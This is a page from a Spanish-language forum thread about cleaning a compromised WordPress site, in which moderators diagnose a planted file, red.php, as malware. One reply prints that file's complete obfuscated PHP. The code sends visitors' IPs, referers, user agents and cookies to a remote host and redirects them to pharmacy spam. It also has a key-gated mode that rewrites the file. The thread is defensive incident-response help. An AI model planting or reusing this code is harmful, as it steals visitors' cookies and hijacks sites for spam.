elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Mi Wordpress Hackeado
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 Ir Abajo Respuesta Imprimir
Autor Tema: Mi Wordpress Hackeado  (Leído 36,674 veces)
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #30 en: 24 Julio 2014, 23:25 pm »

Borra el archivo red.php de wp-includes. Es un claro malware.

Sigo analizando por si hay otros.

Saludos

Borrado el archivo red.php.
Sigo aqui a la espera, y ya lo dije mil veces pero lo sigo diciendo igual. GRACIAS!


En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #31 en: 24 Julio 2014, 23:47 pm »

Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto:

Código:
Only in wp-includes: red.php
diff -r wp-includes/version.php wp-includes-official/version.php
36,37d35
<
< $wp_local_package = 'es_ES';

De modo que si no era el red.php no creo que haya algo más.


En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #32 en: 24 Julio 2014, 23:50 pm »

Me he dado cuenta que el archivo red.php ESTÁ EN TODAS LAS CARPETAS.
WP-CONTENT, WP-INCLUDES, PORTADA.

Estas seguro que es Malware?
El contenido es este:

Código:
<?$tds="http://fbt.yahoo.com/counter.php";$password="fff123106f3430";$g="http://pills-shop.ru";$esdid="counter3";$key="zzzzgb54y45yb45tktbwtberheh6e4wh";?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen('    '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$tt=$tt."&".$key."=".$n;}$tt=urlencode($tt);if(empty($tt)){$tt=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$tt."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y);	while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);}	$w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?>

Perdon que dude, pero me genero esa duda cuando ví que estaba en varias carpetas.
Lo borro de todos lados entonces?


Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto:

Código:
Only in wp-includes: red.php
diff -r wp-includes/version.php wp-includes-official/version.php
36,37d35
<
< $wp_local_package = 'es_ES';

De modo que si no era el red.php no creo que haya algo más.

Entonces esto responde a lo que acabo de escribir arriba no?. Borro todos los red.php que vea y pruebo la web?
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #33 en: 25 Julio 2014, 00:00 am »

¿Todos los red.php son iguales? Hasta no verlos todos, no los elimines. Juntalos todos y subelos.
En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #34 en: 25 Julio 2014, 00:05 am »

Solo con ver

Código:
$g="http://pills-shop.ru";

Ya sabes lo que hay xD

Slaudos
En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #35 en: 25 Julio 2014, 00:17 am »

Gracias a los 2!!
Ya he borrado todo los red.php (todos eran iguales)
Y si entras a la web que pusiste arriba, redirecciona a la de PHARMACY tal como pasaba en la web.

Veré si activo mi web, que sucede ahora. Los mantengo al tanto en mi próxima respuesta!!

EDITO:
Ya he ingresado a la web http://www.wilboradalibros.com.ar/ pero absolutamente TODOS LOS LINKS que clickeo, me llevan a la web de las píldoras :( :( :(
Qué más tendremos que hacer ahora? :(
« Última modificación: 25 Julio 2014, 00:22 am por ka0s » En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #36 en: 25 Julio 2014, 00:25 am »

A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.
En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #37 en: 25 Julio 2014, 00:30 am »

A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.

Actualiza muchas veces, yo matuve apretado F5 2 o 3 segundos y luego me cargó bien la web. Deberías verla. Eso si, los links como dije, siguen redireccionando a la p**a página de pildoras :(
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #38 en: 25 Julio 2014, 00:44 am »

Todavia no me aparece. Tengo la cache deshabilitada con 0 cookies y como quiera me sigue cargando la pagina de safemedpills si acceso a cualquier otra dirección.
En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #39 en: 25 Julio 2014, 00:45 am »

se a mi tambien xD El index ha cambiado pero lo demas no.

Saludos
En línea

Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
RIN.ru Hackeado
Juegos y Consolas
::GD:: 3 3,774 Último mensaje 30 Marzo 2005, 03:57 am
por ::GD::
Ataque DDoS a WordPress : WordPress sufre el mayor ataque DDoS
Noticias
wolfbcn 0 4,614 Último mensaje 4 Marzo 2011, 13:17 pm
por wolfbcn
Me han hackeado
Seguridad
###almohadilla 1 2,688 Último mensaje 4 Abril 2014, 09:50 am
por dRak0
[WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?
Desarrollo Web
0x5d 3 5,141 Último mensaje 12 Abril 2014, 06:47 am
por 0x5d
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines